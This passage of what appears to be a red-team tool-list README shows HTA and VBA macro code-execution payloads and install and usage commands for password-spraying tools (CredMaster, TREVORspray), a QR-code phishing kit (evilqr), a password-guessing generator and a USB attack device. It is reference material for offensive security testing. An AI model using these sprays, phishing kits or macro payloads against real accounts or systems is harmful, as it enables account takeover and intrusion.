class="pl-ent">html</span><span class="pl-kos">></span> <span class="pl-kos"><</span><span class="pl-ent">body</span><span class="pl-kos">></span> <span class="pl-kos"><</span><span class="pl-ent">script</span><span class="pl-kos">></span> <span class="pl-k">var</span> <span class="pl-s1">c</span><span class="pl-c1">=</span> <span class="pl-s">'cmd.exe'</span> <span class="pl-k">new</span> <span class="pl-v">ActiveXObject</span><span class="pl-kos">(</span><span class="pl-s">'WScript.Shell'</span><span class="pl-kos">)</span><span 
class="pl-kos">.</span><span class="pl-en">Run</span><span class="pl-kos">(</span><span class="pl-s1">c</span><span class="pl-kos">)</span><span class="pl-kos">;</span> <span class="pl-kos"></</span><span class="pl-ent">script</span><span class="pl-kos">></span> <span class="pl-kos"></</span><span class="pl-ent">body</span><span class="pl-kos">></span> <span class="pl-kos"></</span><span class="pl-ent">html</span><span class="pl-kos">></span></pre></div> <p dir="auto"><strong>Execute:</strong> Run file</p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a>VBA</h3><a id="user-content-vba" class="anchor" aria-label="Permalink: 🔙VBA" href="#vba"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto"><strong>Creating payload:</strong></p> <div class="highlight highlight-source-python notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="Sub calc() Dim payload As String payload = "calc.exe" CreateObject("Wscript.Shell").Run payload,0 End Sub"><pre><span class="pl-v">Sub</span> <span class="pl-en">calc</span>() <span class="pl-v">Dim</span> <span class="pl-s1">payload</span> <span class="pl-v">As</span> <span class="pl-v">String</span> <span class="pl-s1">payload</span> <span class="pl-c1">=</span> <span class="pl-s">"calc.exe"</span> <span 
class="pl-en">CreateObject</span>(<span class="pl-s">"Wscript.Shell"</span>).<span class="pl-c1">Run</span> <span class="pl-s1">payload</span>,<span class="pl-c1">0</span> <span class="pl-v">End</span> <span class="pl-v">Sub</span></pre></div> <p dir="auto"><strong>Execute:</strong> Set function to Auto_Open() in macro enabled document</p> <div class="markdown-heading" dir="auto"><h1 tabindex="-1" class="heading-element" dir="auto">Initial Access</h1><a id="user-content-initial-access" class="anchor" aria-label="Permalink: Initial Access" href="#initial-access"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/knavesec/CredMaster">CredMaster</a></h3><a id="user-content-credmaster" class="anchor" aria-label="Permalink: 🔙CredMaster" href="#credmaster"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 
1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Launch a password spray / brute force attack via Amazon AWS passthrough proxies, shifting the requesting IP address for every authentication attempt. This dynamically creates FireProx APIs for more evasive password sprays.</p> <p dir="auto">CredMaster provides a method of running anonymous password sprays against endpoints in a simple, easy-to-use tool. The FireProx tool provides the rotating request IP, while the base of CredMaster spoofs all other identifying information.</p> <p dir="auto">Features:</p> <ul dir="auto"> <li>Fully supports all AWS Regions</li> <li>Automatically generates APIs for proxy pass-through</li> <li>Spoofs API tracking numbers, forwarded-for IPs, and other proxy tracking headers</li> <li>Multi-threaded processing</li> <li>Password delay counters & configuration for lockout policy evasion</li> <li>Easily add new plugins</li> <li>Fully anonymous</li> </ul> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/knavesec/CredMaster;cd CredMaster;pip install -r requirements.txt"><pre>git clone https://github.com/knavesec/CredMaster<span class="pl-k">;</span><span class="pl-c1">cd</span> CredMaster<span class="pl-k">;</span>pip install -r requirements.txt</pre></div> <p dir="auto">For full installation instructions see <a href="https://whynotsecurity.com/blog/credmaster/#setup" rel="nofollow">here</a>.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="python3 credmaster.py --plugin {pluginname} --access_key {key} --secret_access_key {key} -u userfile -p 
passwordfile -a useragentfile {otherargs} python3 credmaster.py --config config.json"><pre>python3 credmaster.py --plugin {pluginname} --access_key {key} --secret_access_key {key} -u userfile -p passwordfile -a useragentfile {otherargs} python3 credmaster.py --config config.json</pre></div> <p dir="auto">This tool requires AWS API access keys, a walkthrough on how to acquire these keys can be found here: <a href="https://bond-o.medium.com/aws-pass-through-proxy-84f1f7fa4b4b" rel="nofollow">https://bond-o.medium.com/aws-pass-through-proxy-84f1f7fa4b4b</a></p> <p dir="auto"><a target="_blank" rel="noopener noreferrer" href="https://private-user-images.githubusercontent.com/100603074/423172634-f678cca4-7a53-41e7-9323-51e8efd0e6ba.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNjM0LWY2NzhjY2E0LTdhNTMtNDFlNy05MzIzLTUxZThlZmQwZTZiYS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0xZmUwZWIzMWJjYmM3NWE2NzZlZWM3MGJkZTc1M2QxNjQ3YWY3MmViY2Y3OTU5YTQxOTg3MWExOTM3MWU1MjQ1JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.uPN-W0Xd_kFXzNWGPPhSlLOYeX5V_J_bBQJlnIiiCT0"><img 
src="https://private-user-images.githubusercontent.com/100603074/423172634-f678cca4-7a53-41e7-9323-51e8efd0e6ba.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNjM0LWY2NzhjY2E0LTdhNTMtNDFlNy05MzIzLTUxZThlZmQwZTZiYS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0xZmUwZWIzMWJjYmM3NWE2NzZlZWM3MGJkZTc1M2QxNjQ3YWY3MmViY2Y3OTU5YTQxOTg3MWExOTM3MWU1MjQ1JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.uPN-W0Xd_kFXzNWGPPhSlLOYeX5V_J_bBQJlnIiiCT0" alt="credmaster" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/knavesec/CredMaster/wiki">https://github.com/knavesec/CredMaster/wiki</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/blacklanternsecurity/TREVORspray">TREVORspray</a></h3><a id="user-content-trevorspray" class="anchor" aria-label="Permalink: 🔙TREVORspray" href="#trevorspray"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">TREVORspray is a modular 
password sprayer with threading, SSH proxying, loot modules, and more!</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="pip install https://github.com/blacklanternsecurity/TREVORspray"><pre>pip install https://github.com/blacklanternsecurity/TREVORspray</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Recon python3 ./trevorspray --recon evilcorp.com # Enumerate users via OneDrive python3 ./trevorspray --recon evilcorp.com -u emails.txt --threads 10 # Spray against discovered python3 ./trevorspray -u emails.txt -p 'Welcome123' --url https://login.windows.net/b43asdas-cdde-bse-ac05-2e37deadbeef/oauth2/token"><pre><span class="pl-c"><span class="pl-c">#</span> Recon</span> python3 ./trevorspray --recon evilcorp.com <span class="pl-c"><span class="pl-c">#</span> Enumerate users via OneDrive</span> python3 ./trevorspray --recon evilcorp.com -u emails.txt --threads 10 <span class="pl-c"><span class="pl-c">#</span> Spray against discovered</span> python3 ./trevorspray -u emails.txt -p <span class="pl-s"><span class="pl-pds">'</span>Welcome123<span class="pl-pds">'</span></span> --url https://login.windows.net/b43asdas-cdde-bse-ac05-2e37deadbeef/oauth2/token</pre></div> <p dir="auto">For full usage instructions see <a href="https://github.com/blacklanternsecurity/TREVORspray?tab=readme-ov-file#how-to---o365">here</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer" 
href="https://private-user-images.githubusercontent.com/100603074/423172625-67c64f6d-527a-4b59-8dd9-b73bc68274f4.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNjI1LTY3YzY0ZjZkLTUyN2EtNGI1OS04ZGQ5LWI3M2JjNjgyNzRmNC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1kM2M5NjA5NTA0MmJjNTQzZjMyYzViOGZjMjE4YzE3MmE2ZmVkOTQ3NjJmYTEzMzZiN2M4NTYwMTc4NGJjZDg4JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.YQZ3I12_jIbHB1aOb1hE1UK4H_P1cNvlR7u0hIhxUY4"><img src="https://private-user-images.githubusercontent.com/100603074/423172625-67c64f6d-527a-4b59-8dd9-b73bc68274f4.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNjI1LTY3YzY0ZjZkLTUyN2EtNGI1OS04ZGQ5LWI3M2JjNjgyNzRmNC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1kM2M5NjA5NTA0MmJjNTQzZjMyYzViOGZjMjE4YzE3MmE2ZmVkOTQ3NjJmYTEzMzZiN2M4NTYwMTc4NGJjZDg4JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.YQZ3I12_jIbHB1aOb1hE1UK4H_P1cNvlR7u0hIhxUY4" alt="TREVORspray" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/blacklanternsecurity/TREVORspray">https://github.com/blacklanternsecurity/TREVORspray</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/kgretzky/evilqr">evilqr</a></h3><a 
id="user-content-evilqr" class="anchor" aria-label="Permalink: 🔙evilqr" href="#evilqr"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Toolkit demonstrating another approach to a QRLJacking attack, which enables remote account takeover through sign-in QR code phishing.</p> <p dir="auto">It consists of a browser extension used by the attacker to extract the sign-in QR code and a server application, which retrieves the sign-in QR codes to display them on the hosted phishing pages.</p> <p dir="auto">Demo <a href="https://www.youtube.com/watch?v=8pfodWzqMcU" rel="nofollow">video</a></p> <p dir="auto"><strong>Install: (Extension)</strong></p> <p dir="auto">You can load the extension in Chrome through the <code>Load unpacked</code> feature: <a href="https://developer.chrome.com/docs/extensions/mv3/getstarted/development-basics/#load-unpacked" rel="nofollow">https://developer.chrome.com/docs/extensions/mv3/getstarted/development-basics/#load-unpacked</a></p> <p dir="auto">Once the extension is installed, make sure to pin its icon in Chrome's extension toolbar, so that the icon is always visible.</p> <p dir="auto"><strong>Install: (Server)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/kgretzky/evilqr;cd
evilqr/server/;build_run.bat"><pre>git clone https://github.com/kgretzky/evilqr<span class="pl-k">;</span><span class="pl-c1">cd</span> evilqr/server/<span class="pl-k">;</span>build_run.bat</pre></div> <p dir="auto"><strong>Usage:</strong></p> <ol dir="auto"> <li>Run the server by running the built server binary: <code>./server/build/evilqr-server</code></li> <li>Open any of the supported websites in your Chrome browser, with installed <strong>Evil QR</strong> extension:</li> </ol> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="https://discord.com/login https://web.telegram.org/k/ https://whatsapp.com https://store.steampowered.com/login/ https://accounts.binance.com/en/login https://www.tiktok.com/login"><pre class="notranslate"><code>https://discord.com/login https://web.telegram.org/k/ https://whatsapp.com https://store.steampowered.com/login/ https://accounts.binance.com/en/login https://www.tiktok.com/login </code></pre></div> <ol start="3" dir="auto"> <li>Make sure the sign-in QR code is visible and click the <strong>Evil QR</strong> extension icon in the toolbar. 
If the QR code is recognized, the icon should light up with colors.</li> <li>Open the server's phishing page URL: <code>http://127.0.0.1:35000</code> (default)</li> </ol> <p dir="auto"><a target="_blank" rel="noopener noreferrer" href="https://private-user-images.githubusercontent.com/100603074/423172607-00ad78c5-1978-4e59-a522-7e8b9c39b1c3.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNjA3LTAwYWQ3OGM1LTE5NzgtNGU1OS1hNTIyLTdlOGI5YzM5YjFjMy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT01MjliZTU4NmYzZTZmNmNjZjViMDg4OWVlYTNkZGRhMTYwMDk4ZDEyMTI2MGU0ZDNlOTkxM2YzZDk4NDEzM2VmJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.LavVF9LZlkFYH3JEOSizSu0pgNEGBWcqVtr6p2AdFwA"><img src="https://private-user-images.githubusercontent.com/100603074/423172607-00ad78c5-1978-4e59-a522-7e8b9c39b1c3.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNjA3LTAwYWQ3OGM1LTE5NzgtNGU1OS1hNTIyLTdlOGI5YzM5YjFjMy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT01MjliZTU4NmYzZTZmNmNjZjViMDg4OWVlYTNkZGRhMTYwMDk4ZDEyMTI2MGU0ZDNlOTkxM2YzZDk4NDEzM2VmJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.LavVF9LZlkFYH3JEOSizSu0pgNEGBWcqVtr6p2AdFwA" alt="evilqr" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://breakdev.org/evilqr-phishing/" 
rel="nofollow">https://breakdev.org/evilqr-phishing/</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/Mebus/cupp">CUPP</a></h3><a id="user-content-cupp" class="anchor" aria-label="Permalink: 🔙CUPP" href="#cupp"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">The most common form of authentication is the combination of a username and a password or passphrase. 
Passwords can sometimes be guessed profiling the user, such as a birthday, nickname, address, name of a pet or relative, or a common word such as God, love, money or password.</p> <p dir="auto">That is why CUPP was born.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/Mebus/cupp;cd cupp"><pre>git clone https://github.com/Mebus/cupp<span class="pl-k">;</span><span class="pl-c1">cd</span> cupp</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Run in interactive mode python3 ./cupp.py -i"><pre><span class="pl-c"><span class="pl-c">#</span> Run in interactive mode</span> python3 ./cupp.py -i</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer" href="https://private-user-images.githubusercontent.com/100603074/423172603-39ad1c58-de4e-449a-b2d4-a9629d5ab82c.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNjAzLTM5YWQxYzU4LWRlNGUtNDQ5YS1iMmQ0LWE5NjI5ZDVhYjgyYy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT02NDdlY2VlNGYxZDQwZGY1ZmRhNTEzNTczY2Q2Y2M0YTliMWI0NjliNzc2YWU0YjNhZmY4MWQzNmNiNTc5NTRlJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.ojCDSk4bT3ngU0K4rrZaolNnqXMAbvHzltaFfxSmmuM"><img 
src="https://private-user-images.githubusercontent.com/100603074/423172603-39ad1c58-de4e-449a-b2d4-a9629d5ab82c.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNjAzLTM5YWQxYzU4LWRlNGUtNDQ5YS1iMmQ0LWE5NjI5ZDVhYjgyYy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT02NDdlY2VlNGYxZDQwZGY1ZmRhNTEzNTczY2Q2Y2M0YTliMWI0NjliNzc2YWU0YjNhZmY4MWQzNmNiNTc5NTRlJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.ojCDSk4bT3ngU0K4rrZaolNnqXMAbvHzltaFfxSmmuM" alt="cupp" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/Mebus/cupp">https://github.com/Mebus/cupp</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://shop.hak5.org/products/bash-bunny" rel="nofollow">Bash Bunny</a></h3><a id="user-content-bash-bunny" class="anchor" aria-label="Permalink: 🔙Bash Bunny" href="#bash-bunny"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">The Bash Bunny is a physical USB attack tool and 
multi-function payload delivery system. It is designed to be plugged into a computer's USB port and can be programmed to perform a variety of functions, including manipulating and exfiltrating data, installing malware, and bypassing security measures.</p> <p dir="auto"><a href="https://hackinglab.cz/en/blog/bash-bunny-guide/" rel="nofollow">hackinglab: Bash Bunny – Guide</a></p> <p dir="auto"><a href="https://docs.hak5.org/bash-bunny/" rel="nofollow">Hak5 Documentation</a></p> <p dir="auto"><a href="https://github.com/hak5/bashbunny-payloads">Nice Payload Repo</a></p> <p dir="auto"><a href="https://hak5.org/products/bash-bunny" rel="nofollow">Product Page</a></p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/209868292-cc02ce20-7d8e-4019-b953-7082fb0eb828.png"><img src="https://user-images.githubusercontent.com/100603074/209868292-cc02ce20-7d8e-4019-b953-7082fb0eb828.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" 